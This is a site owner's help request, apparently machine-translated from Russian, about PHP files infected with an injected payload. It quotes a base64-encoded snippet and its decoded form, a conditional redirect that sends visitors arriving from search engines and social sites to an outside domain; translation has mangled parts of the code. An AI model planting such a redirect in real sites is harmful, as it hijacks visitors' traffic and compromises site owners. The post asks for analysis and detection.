14 февраля этого года мой веб-сайт подвергся атаке вредоносного кода, о котором я узнал после действия Google 29 февраля, но все php-файлы подверглись воздействию вредоносного кода. При проверке я получил следующий код
эхо base64_decode ( "/ KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9");
при декодировании он стал
error_reporting (0);$ qazplm = headers_sent ();if (! $ qazplm) {$ referer = $ _SERVER ['HTTP_REFERER'];$ uag = $ _SERVER ['HTTP_USER_AGENT'];if ($ uag) {if (stristr ($ referer, "yahoo") или stristr ($ referer, "bing") или stristr ($ referer, "rambler") или stristr ($ referer, "gogo") или stristr ($ referer, "live.com") или stristr ($ referer, "aport") или stristr ($ referer, "nigma") или stristr ($ referer, webalta ") или stristr ($ referer, begin.ru")) или stristr ($ referer, "stumbleupon.com") или stristr ($ referer, "bit.ly") или stristr ($ referer, tinyurl.com ") или preg_match (" / yandex.ru/yandsearch \? (. *?) \ & lr \ = / ", $ referer) или preg_match (" / google. (. *?) / url / ", $ referer) или stristr ($ referer," myspace.com ") или stristr ($referer, "facebook.com") или stristr ($ referer, "aol.com")) {if (! stristr ($ referer, "cache") или! stristr ($ referer, "inurl")) {header ("Местоположение: http://namesti.bee.pl/"); exit ();}}}}
Я не знаю, как он попал на мой сервер, но все php-файлы были выполнены, но другие в порядке.сейчас. Я просто хочу знать, сколько вреда он может нанести И что именно этот код делает. Как я могу его обнаружить. Это сценарий, который выполняет OВ определенное время.